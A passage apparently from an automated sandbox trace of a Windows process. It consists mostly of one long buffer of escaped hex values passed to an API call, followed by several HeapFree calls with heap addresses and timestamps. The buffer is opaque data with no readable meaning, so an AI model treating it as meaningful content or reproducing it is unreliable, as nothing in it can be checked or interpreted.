1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: 